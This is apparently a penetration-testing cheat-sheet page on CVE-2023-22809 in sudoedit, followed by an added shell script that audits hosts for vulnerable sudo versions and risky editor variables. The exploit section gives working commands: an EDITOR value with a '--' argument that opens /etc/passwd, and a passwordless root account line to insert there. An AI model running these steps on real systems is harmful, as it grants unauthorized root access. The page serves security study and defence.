Sudoedit Privilege Escalation
Last modified: 2023-03-11
Some versions of sudoedit are vulnerable to privilege escalation.
Investigation
sudo -l
(root) sudoedit /opt/example.txt
If we can execute the sudoedit command as root, we may be able to escalate privileges on some sudo versions.
Exploitation (CVE-2023-22809)
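In sudo versions before 1.9.12p2, sudoedit can be made to modify arbitrary files with unrestricted privileges. A "--" argument in the EDITOR environment variable is treated as the start of the list of files to edit, so a file named after it is opened in addition to the one the sudoers rule allows.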
export EDITOR="vim -- /etc/passwd"
sudo sudoedit /opt/example.txt
In the vim editor, add the following new line to /etc/passwd:
sudoedit::0:0:root:/root:/bin/bash
Now we can get a root shell.
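A defender-side check for the condition described above, as an added example that is not part of the original page: it flags sudo versions older than 1.9.12p2 and editor variables carrying a bare "--" argument like the EDITOR value shown. The function names are hypothetical, and the sudoers line it prints is the workaround from the sudo project's advisory.

```shell
#!/bin/sh
# Added example: audit helpers for CVE-2023-22809. Function names are
# hypothetical; the 1.9.12p2 threshold is the one stated on this page.

# 0 = older than 1.9.12p2 (affected), 1 = fixed, 2 = unparseable version.
sudo_is_vulnerable() {
    case $1 in
        *p*) num=${1%%p*}; pl=${1#*p} ;;   # "1.9.12p1" -> 1.9.12 and 1
        *)   num=$1; pl=0 ;;
    esac
    case "$num.$pl" in
        *[!0-9.]*|.*|*.|*..*) return 2 ;;  # reject anything but digits/dots
    esac
    IFS=. read -r maj min pat rest <<EOF
$num
EOF
    # Compare field by field against 1.9.12p2.
    set -- "${maj:-0}" 1 "${min:-0}" 9 "${pat:-0}" 12 "$pl" 2
    while [ $# -gt 0 ]; do
        if [ "$1" -lt "$2" ]; then return 0; fi
        if [ "$1" -gt "$2" ]; then return 1; fi
        shift 2
    done
    return 1
}

# 0 if the editor string contains a stand-alone "--" argument.
editor_has_separator() {
    case " $(printf '%s' "$1" | tr '\t' ' ') " in
        *" -- "*) return 0 ;;
    esac
    return 1
}

# Report on the local host: installed sudo version and current environment.
audit_sudoedit() {
    ver=$(sudo -V 2>/dev/null | sed -n '1s/^Sudo version //p')
    if sudo_is_vulnerable "$ver"; then
        echo "sudo $ver predates 1.9.12p2: upgrade, or add to sudoers:"
        echo '  Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR"'
    fi
    for name in SUDO_EDITOR VISUAL EDITOR; do
        eval "val=\${$name-}"
        if editor_has_separator "$val"; then
            echo "$name contains a bare \"--\" argument: $val"
        fi
    done
}

if [ "${1:-}" = "--audit" ]; then audit_sudoedit; fi
```

Run the script with --audit to check the local host; the two helper functions can also be applied to version strings and environment values collected from other machines.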